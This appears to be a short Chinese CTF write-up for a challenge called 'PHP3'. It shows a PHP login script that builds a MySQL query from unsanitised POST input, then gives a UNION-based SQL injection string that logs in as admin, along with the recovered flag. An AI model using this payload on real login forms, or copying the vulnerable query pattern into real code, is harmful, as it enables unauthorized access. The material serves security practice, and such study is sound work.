发表于 | 更新于 | 分类于

PHP3:
source当中的SQL部分如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
if($_POST[user] && $_POST[pass]) {
  mysql_connect("localhost","php3","xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
  mysql_select_db("php3");

  $user = $_POST[user];
  $pass = md5($_POST[pass], True);
  $query = @mysql_fetch_array(mysql_query("select user from php3 where (user='$user') and (pw='$pass')"));

  if($query[user]=="admin") {
    echo "<p>Logged in! Key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx </p>";
  }

  if($query[user] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}

?>

直接通过注入绕过即可
usr: ‘) UNION select user from php3 where (user=’admin’) —
pass: anypass

key: 8ab9b92c174dd483ad17cee1bb0c5bdb

阅读全文 »